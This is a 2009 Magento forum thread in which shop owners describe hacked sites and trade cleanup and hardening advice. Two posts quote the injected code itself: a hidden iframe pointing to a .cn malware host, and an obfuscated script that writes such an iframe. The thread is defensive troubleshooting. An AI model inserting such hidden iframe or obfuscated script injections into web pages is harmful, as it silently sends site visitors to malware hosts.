Magento Forum

   
Page 1 of 2
iFrame hack? Can’t acces website or admin anymore… HELP Please
 
Loek
Jr. Member
 
Total Posts:  23
Joined:  2009-05-04
 

Hello,

Today I wen’t to office and our webshop ( www . elout . eu ) doesn’t work anymore… Also I can’t acces the admin panel anymore…

When I’m opening our homepage the following error is shown:

Parse error: syntax error, unexpected ‘<’ in /home/theproje/domains/elout.eu/public_html/index.php on line 54

When I’m opening the index.php file I saw this lines:

51 mask(0);
52 Mage::run();
53
54 <iframe src="http://superlottry.cn:8080/ts/in.cgi?pepsi41" width=125 height=125 style="visibility: hidden"></iframe>

When I remove line 54 nothing happened ( I’ve deleted te cache) ....

Anybody here who knows how to solve this problem??

We are using magento for two weeks. Is our website already hacked?

 
Magento Community Magento Community
Magento Community
Magento Community
 
Loek
Jr. Member
 
Total Posts:  23
Joined:  2009-05-04
 

Thank you for your reply!

I removed the lines with superlottry in it and the site is working again.

Can you tell me how I can secure the website so that it won´t hapain again?

Do I need to change admin passwords, ftp passwords or something?

Greets

 
Magento Community Magento Community
Magento Community
Magento Community
 
AFemaleProdigy
Jr. Member
 
Total Posts:  13
Joined:  2009-02-18
 

I believe this is a problem with Magento, not with the hosting server.  I too have experienced the same exact thing.... TWICE! 

I installed magento the first time and shortly after… wham!  My index page was giving me the same error. So I opened up the file and found new code that shouldn’t be there.  Removing the code did not fully fix the problem.  I had to upload a fresh copy of the index file because some of the last lines of the default code had been deleted.  Admin area would not let me log in.  Resetting password would not work.  The tutorials here did not work.  I tried re-uploading EVERYTHING which took forever.  Still… it wouldn’t work.  After talking to some people, everyone convinced me my server must have been compromised.  So, we moved to another server, I changed all passwords (complicated passwords) to everything, including the database.  I completed removed the entire site and reinstalled (since it was a new installation anyway).  I figured better safe to make sure I didn’t miss anything.

So, a few weeks go by with the clean install and new passwords and guess what… same thing happened again!  I just noticed it.  So I uploaded a fresh copy of index again, but my admin area is acting wierd.  I was able to log in this time, but none of the navigation links in admin are working.

Something is wrong here and it’s not the server.  PLEASE… someone help us out here.  I have a feeling more people will be complaining about this if it’s some sort of exploit or flaw in the Magento code.

 
Magento Community Magento Community
Magento Community
Magento Community
 
gfxguru
Sr. Member
 
Total Posts:  186
Joined:  2008-11-20
 

Glad I’m not the only person that has run into this. I’m removing magento for now. This is a serious security issue! and in no way I’m I going to compromise other merchants on our servers. Not to mention magento is a true resource hog. Get a site with 10-15 people on it and it’s done.

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

We went through 3 months of fighting a hack on our magento install. 
Everytime we changed our password within a couple of days we were hacked again.
Added a lot of security code to our .htaccess file.  Didn’t help.

We finally had to have our ISP closed down our account and open a new one and reinstall everything.

We have not reinstalled magento.

We got hacked the first time within 2 days of installing magento.  Never had been hacked in 5 years.

 
Magento Community Magento Community
Magento Community
Magento Community
 
SSmeredith
Jr. Member
 
Total Posts:  4
Joined:  2009-03-12
 

I can’t speak for Magento as I have yet to install, except for a temporary demo install a few months back.  Anyway, I had this same problem with Joomla!  for the last month.  The iframe malicious code injection was a downright nightmare - and it spread to all of my sites.

There were issues on my part and my hosts. 

You can keep fixing that index file but I can promise you it will come back if you don’t take any precautions. 

First - you should consider that you put it there from your own pc.  So I started with malwarebytes.com and the hijackthis and got rid of few trojans - who knew. 

Then you need to pass protect your admin folder through the cpanel option or whatever - so basically you have to login twice to use the admin interface.  That helps alot.  But again, if the virus is already in there, changing the pwds won’t help until you can get it out.

So use your ftp to see the dates of last access files - look for your folders that have an index.html ( which the viruses reside like the one mentioned above and you can double check from your original files and remove those looong number sequences, in Joomla anyway, not familiar with Mage to say for sure ) and then also the folders with the added .htaccess and random number .php file like this:  BTW, I had 2,692 of these files to remove plus each one with an .htaccess to delete as well.  Ouch.

.htaccess
556386.php

A robot hits on a non eixistent file, the little buggers, and “looks” in the htaccess file which shows an error redirect to the .php file which refers back to ......  WHERE??  exactly. 

So, you have to have your host run a clamscan or something on everything.  And they won’t even catch the .php files most likely.  Don’t even bother changing them until you find to script that it goes with.  Mine was found running under Usage.php which looked like it belonged but clearly did not so that was immediately deleted.

Oh and make sure your host is running the latest on Apache and Php.  And hope your existing installs are compatible.

And another way to check is unually high bandwidth for a site you know isn’t getting that much traffic.  There are also randomly named folders with funny names like ‘water’ or ‘catch’ added that contain, get this - images like you get when you get spammed with drug and pill spams. Well they’re using your bandwidth to host those images!  And you’re getting blacklisted. 

Now I know this is alot and I’m not very organized in my thoughts here but that’s about how it felt going through this.  And I’m pretty sure there were multiple types of injections in the sites for different purposes.  If it was only one type then wow, it’s a pretty complex virus/trojan whatever.

So..... while I’m now convinced anything written in php is pretty much up for grabs by crackers, let’s not lay the blame totally with Magento as Joomla has the same problems and probably many more - still can’t figure out why people are flocking to PHP?  And yes, I guess I’m a glutton for punishment because I’m going back for more and will continue to use both Magento and Joomla again until a viable yet affordable language comes along wink

Good luck and make a checklist for your host and yourself to get through the process. Keeps down on the runaround.

The totally depleted but not defeated -
M

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

I bet the people with these issues are using Magento Connect with all the open file permissions it requires.

It would be interesting if Varien could make a comparison of hosting environments and Magento configuration to confirm or dismiss what this was due to.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Sensi
Sr. Member
 
Total Posts:  103
Joined:  2008-07-31
Paris, France
 

See http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ between others. This malware seems to hack into your computer via your browser with an infected PDF (targeting Acrobat reader) or flash file, steal your saved FTP passwords from well-known FTP programs and then infect your websites.

People should check that their PCs aren’t infected, disable register global on their server, check their files permissions, etc. And of course change their hosting solution -at least configure it properly, shared hosting isn’t an option- if they claim that it can’t handle 10 users over magento. wink

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Unless you have real visitors from China, I guess you could also blanket block chinese IPs or anything .cn by hostname. There are plenty of websites that list all current IP address blocks of an entire nation and I’ve used those for one non-Magento site to stop blog spam effectively (Blocked China and Ukraine).

Anyway, it seems to me this indeed isn’t a Magento issue but as it appears, compromised passwords. Changing your FTP credentials and deleting your FTP programs should be a good step in the right direction.

 
Magento Community Magento Community
Magento Community
Magento Community
 
piotrekkaminski
Member
 
Avatar
Total Posts:  73
Joined:  2007-09-01
 

Hello,

Please see similar issue, also caused by malware, here:
http://www.magentocommerce.com/boards/viewthread/41070/#t133175

Thanks

 
Magento Community Magento Community
Magento Community
Magento Community
 
vikshu
Member
 
Total Posts:  69
Joined:  2009-04-09
Noida
 

I too am facing the same problem. My index.php was hacked last week, i replaced it with fresh one and applied password to my site. But today again it was hacked with following codes in line 51 of index.php.

Mage::run('default');<?php echo ''?><?php echo '<script>[removed]("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'?>

Please someone suggest how to get rid of this think. If this is the security of magento then i am really worried .

Please give me a solution to get rid of this issue

 
Magento Community Magento Community
Magento Community
Magento Community
 
fr0x
Member
 
Total Posts:  59
Joined:  2009-05-20
 

As was posted in this thread:
http://www.magentocommerce.com/boards/viewthread/41070/#t133175

It isn’t an issue with magento but rather you (or someone with ftp access) had their passwords stolen via malware/virus/trojan.  Reset your FTP passwords (and run a virus scan on your PCs that have accessed Magento).

It seems rather to be related to FTP passwords being stolen by malware installed on your computer. Please check http://www.abelcheng.com/my-sites-are-hacked-&#xE2;&#x80;&#x93;-heres-how-i-fixed-it/

A few free scanners:
http://www.eset.com/download/free_trial_download.php
http://housecall.trendmicro.com/

 
Magento Community Magento Community
Magento Community
Magento Community
 
secure site
Jr. Member
 
Total Posts:  1
Joined:  2009-07-07
 

If you are having trouble removing the scripts from your pages and/or getting your site back into Google’s good graces, you might want to check out http://www.iframehack.com .  Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the “attack site” label removed.

Hope this helps someone!

 
Magento Community Magento Community
Magento Community
Magento Community
 
vikshu
Member
 
Total Posts:  69
Joined:  2009-04-09
Noida
 

Thanks,

I have retrieve back the access of my site. have changed the FTP passwords and all.
Isn’t there some full proof solution for it?
I read somewhere about using htaccess file. Can someone please tell me how it is done?
Please this is very important.

 
Magento Community Magento Community
Magento Community
Magento Community
 
fr0x
Member
 
Total Posts:  59
Joined:  2009-05-20
 

http://www.google.com/search?&q;=restrict+ftp+to+ip

I would assume one of those would help you (depending on your server setup).

 
Magento Community Magento Community
Magento Community
Magento Community
 
gfxguru
Sr. Member
 
Total Posts:  186
Joined:  2008-11-20
 

uh you are wrong about the ftp passwords access. I’ve seen this on our server and we don’t have FTP running.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
    Back to top
Page 1 of 2